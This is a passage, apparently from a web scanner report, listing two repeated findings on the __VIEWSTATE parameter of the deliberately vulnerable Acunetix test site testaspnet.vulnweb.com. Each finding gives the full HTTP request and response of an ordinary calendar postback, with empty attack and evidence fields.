</TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8461&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAAxGxGtsIZGRk1ZHCXoM1EJVYRzNubS%2BbUbYTVlU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLDw7epBgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJROTD6K3KVwuAkYI8KV%2BoRUEKEkg%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:34 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAAxGxGtsIZGRk1ZHCXoM1EJVYRzNubS+bUbYTVlU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLDw7epBgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJROTD6K3KVwuAkYI8KV+oRUEKEkg=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:White" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8465&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAqrrVHdsIZGRkUKN33oukto1lrN4O6l%2Foyz60wFk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKSsoCsBgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJmovB23KS9PMXnY4Nz5WUyr4zqzQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:31 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAqrrVHdsIZGRkUKN33oukto1lrN4O6l/oyz60wFk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKSsoCsBgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJmovB23KS9PMXnY4Nz5WUyr4zqzQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:White" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 